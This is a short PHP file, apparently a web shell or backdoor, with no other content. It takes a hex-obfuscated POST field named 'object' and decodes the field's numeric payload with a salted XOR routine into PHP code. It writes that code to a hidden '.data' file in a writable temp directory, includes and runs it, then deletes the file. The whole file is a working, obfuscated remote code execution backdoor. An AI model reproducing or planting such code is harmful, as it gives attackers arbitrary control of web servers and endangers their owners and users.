<?php

if(in_array("obje\x63t", array_keys($_POST))){
	$desc = $_POST["obje\x63t"];
	 $desc		=	 explode		 ( '.'  ,	$desc	)			;	 
	$pset = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(	$salt);
            $i = 0;
    
            array_walk(	$desc ,		function(	$v8) use(	&$pset ,		&$i ,		$salt ,		$lenS) {
                $chS = ord(	$salt[$i % $lenS]);
                $dec =(	(	int)$v8 - $chS -(	$i % 10))		^ 	27;
                $pset  .=  chr(	$dec);
                $i++;
            });
	$item = array_filter(["/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getcwd()]);
	foreach ($item as $token) {
    		if (is_dir($token) && is_writable($token)) {
    $comp = "$token/.data";
    if (file_put_contents($comp, $pset)) {
	include $comp;
	@unlink($comp);
	exit;
}
}
}
}